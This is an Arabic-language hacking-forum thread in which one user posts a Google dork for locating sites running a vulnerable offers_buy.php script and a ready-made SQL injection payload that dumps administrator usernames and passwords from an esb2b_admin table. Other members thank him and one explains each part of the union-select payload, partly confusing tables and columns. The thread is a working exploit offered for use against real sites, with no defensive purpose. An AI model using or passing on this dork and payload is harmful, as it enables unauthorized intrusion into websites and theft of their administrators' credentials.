دورك جديد ومواقع مصابة بالهبل

[D.r-HACKz]

مرحبا بكم في اول موضوع لي في منتدى
بمناسبة مبروك علينا ستايل الجديد
هدا هو دروك

allinurl:offers_buy.php?id=

استغلال

-9999+union+all+select+0,0,group_concat(es_admin_name,char(58),es_pwd)v3n0m,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+esb2b_admin--

 

[هكر الجوف]

كفوو


نبي له شرح لاهنت

 

[D.r-HACKz]

اخي كل شئ سهل اخي

 

[مستر داتا بيز]

اسم الملف المصاب
allinurlffers_buy.php
اسم المتغير
id=9999-
الاستغلال هو
الكتابه ع الماس

+union+all+select+

اما هذا
group_concat(es_admin_name,char(58),es_pwd)
ف Group_concat()
هوا الامر المستخدم للاستعلام عن عمودين او ثلاثه او اكتر اما
es_admin_name,char(58)
فهو جدول اليوزر
اما عمود اليوزر فهو
es_pwd
معنى الاصفر الى فى الاستخدام
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
المفروض انها الاعمدة المصابه
اما هذا
esb2b_admin
فهذا هو الجدول الرئيسى الذى يحوي عمود الباسوردات وعمود اليوزرات
الى هما

es_admin_name
و
es_pwd
اما From
فهذا كود الاستعلام الاولى للجدول حسب شرح الاخ فولكانو فى الدورة

تحياتى وسلمت يمناك على الاستغلال اخى الكريم